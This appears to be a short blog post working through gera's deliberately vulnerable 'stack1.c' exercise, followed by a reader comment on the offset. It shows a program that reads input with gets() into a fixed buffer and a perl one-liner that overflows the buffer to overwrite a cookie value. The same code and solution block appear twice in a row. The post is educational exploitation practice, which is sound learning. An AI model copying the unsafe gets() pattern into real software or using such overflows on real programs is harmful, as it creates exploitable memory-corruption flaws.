I've been supplementing my reading of Gray Hat Hacking, Second Edition: The Ethical Hacker's Handbook with gera's Insecure Programming by example.
/* stack1.c *
* specially crafted to feed your brain by gera */
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x41424344)
printf("you win!\n");
}
$ perl -e 'print "A" x 92;' > of
$ echo "DCBA" >> of
$ stack1 < of
buf: bffff4b0 cookie: bffff50c
you win!
/* stack1.c *
* specially crafted to feed your brain by gera */
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x41424344)
printf("you win!\n");
}
$ perl -e 'print "A" x 92;' > of
$ echo "DCBA" >> of
$ stack1 < of
buf: bffff4b0 cookie: bffff50c
you win!
Strange that you ended up with 92, I had 80... some sort of compiler difference?
ReplyDeleteHere's my MD5;
d8dce899f15a83b224f6d21fe1c40cd6 stack1